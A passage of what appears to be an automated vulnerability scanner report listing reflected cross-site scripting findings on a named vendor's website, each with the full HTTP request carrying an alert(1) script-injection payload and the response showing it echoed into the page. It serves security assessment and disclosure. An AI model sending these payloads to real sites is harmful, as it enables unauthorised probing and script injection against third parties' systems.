Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387583"
Content-Type: text/html; charset=utf-8
Content-Length: 40475
Date: Sun, 23 Oct 2011 16:33:12 GMT
X-Varnish: 1652555698
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/filese7ab2"><script>alert(1)</script>7f0af06d8a8/css_injector_153.css?3" />
...[SNIP]...

1.68. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5359"-alert(1)-"cd57c50c64d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/filesa5359"-alert(1)-"cd57c50c64d/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:33:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387615"
Content-Type: text/html; charset=utf-8
Content-Length: 40324
Date: Sun, 23 Oct 2011 16:33:48 GMT
X-Varnish: 1652557559
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesa5359"-alert(1)-"cd57c50c64d/css_injector_153.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.69. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17380"-alert(1)-"a97d3645399 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/css_injector_153.css17380"-alert(1)-"a97d3645399?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387752"
Content-Type: text/html; charset=utf-8
Content-Length: 39279
Date: Sun, 23 Oct 2011 16:35:58 GMT
X-Varnish: 1652565905
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css17380"-alert(1)-"a97d3645399?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.70. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42389"><script>alert(1)</script>fe0bc3262be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_153.css42389"><script>alert(1)</script>fe0bc3262be?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387729"
Content-Type: text/html; charset=utf-8
Content-Length: 37876
Date: Sun, 23 Oct 2011 16:35:34 GMT
X-Varnish: 1652564616
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css42389"><script>alert(1)</script>fe0bc3262be?3" />
...[SNIP]...

1.71. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96bdd"-alert(1)-"6bfa7bc0a81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites96bdd"-alert(1)-"6bfa7bc0a81/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387373"
Content-Type: text/html; charset=utf-8
Content-Length: 39749
Date: Sun, 23 Oct 2011 16:29:45 GMT
X-Varnish: 1652547053
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites96bdd"-alert(1)-"6bfa7bc0a81/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-
...[SNIP]...

1.72. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43842"><script>alert(1)</script>e1e6eab895c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites43842"><script>alert(1)</script>e1e6eab895c/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387304"
Content-Type: text/html; charset=utf-8
Content-Length: 37708
Date: Sun, 23 Oct 2011 16:28:36 GMT
X-Varnish: 1652542990
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites43842"><script>alert(1)</script>e1e6eab895c/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.73. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cec1c"-alert(1)-"d595b6eb599 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.comcec1c"-alert(1)-"d595b6eb599/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:32:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387544"
Content-Type: text/html; charset=utf-8
Content-Length: 38883
Date: Sun, 23 Oct 2011 16:32:58 GMT
X-Varnish: 1652553972
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comcec1c"-alert(1)-"d595b6eb599/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.74. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3361"><script>alert(1)</script>27b501de15b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.coma3361"><script>alert(1)</script>27b501de15b/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387448"
Content-Type: text/html; charset=utf-8
Content-Length: 37684
Date: Sun, 23 Oct 2011 16:31:53 GMT
X-Varnish: 1652550051
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.coma3361"><script>alert(1)</script>27b501de15b/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.75. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97b0"><script>alert(1)</script>8427b1bbb6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/filesd97b0"><script>alert(1)</script>8427b1bbb6c/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387650"
Content-Type: text/html; charset=utf-8
Content-Length: 40718
Date: Sun, 23 Oct 2011 16:34:22 GMT
X-Varnish: 1652559309
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/filesd97b0"><script>alert(1)</script>8427b1bbb6c/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.76. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df6a"-alert(1)-"781c5a497bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files4df6a"-alert(1)-"781c5a497bf/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:44 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387684"
Content-Type: text/html; charset=utf-8
Content-Length: 40567
Date: Sun, 23 Oct 2011 16:34:55 GMT
X-Varnish: 1652561742
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files4df6a"-alert(1)-"781c5a497bf/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.77. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51137"><script>alert(1)</script>f1f4ddf51ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools51137"><script>alert(1)</script>f1f4ddf51ec/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387724"
Content-Type: text/html; charset=utf-8
Content-Length: 40549
Date: Sun, 23 Oct 2011 16:35:27 GMT
X-Varnish: 1652564197
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools51137"><script>alert(1)</script>f1f4ddf51ec/css/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.78. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d93"-alert(1)-"48e1557ded2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools15d93"-alert(1)-"48e1557ded2/css/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387745"
Content-Type: text/html; charset=utf-8
Content-Length: 40398
Date: Sun, 23 Oct 2011 16:35:53 GMT
X-Varnish: 1652565598
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools15d93"-alert(1)-"48e1557ded2/css/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.79. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c719e"-alert(1)-"2c77cae502e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools/cssc719e"-alert(1)-"2c77cae502e/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387796"
Content-Type: text/html; charset=utf-8
Content-Length: 39441
Date: Sun, 23 Oct 2011 16:36:42 GMT
X-Varnish: 1652568178
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/cssc719e"-alert(1)-"2c77cae502e/4d9813e9d0c158247f09dd5a908f5979.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.80. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4d14"><script>alert(1)</script>1573b83a4d3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/cssd4d14"><script>alert(1)</script>1573b83a4d3/4d9813e9d0c158247f09dd5a908f5979.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:21 +0000
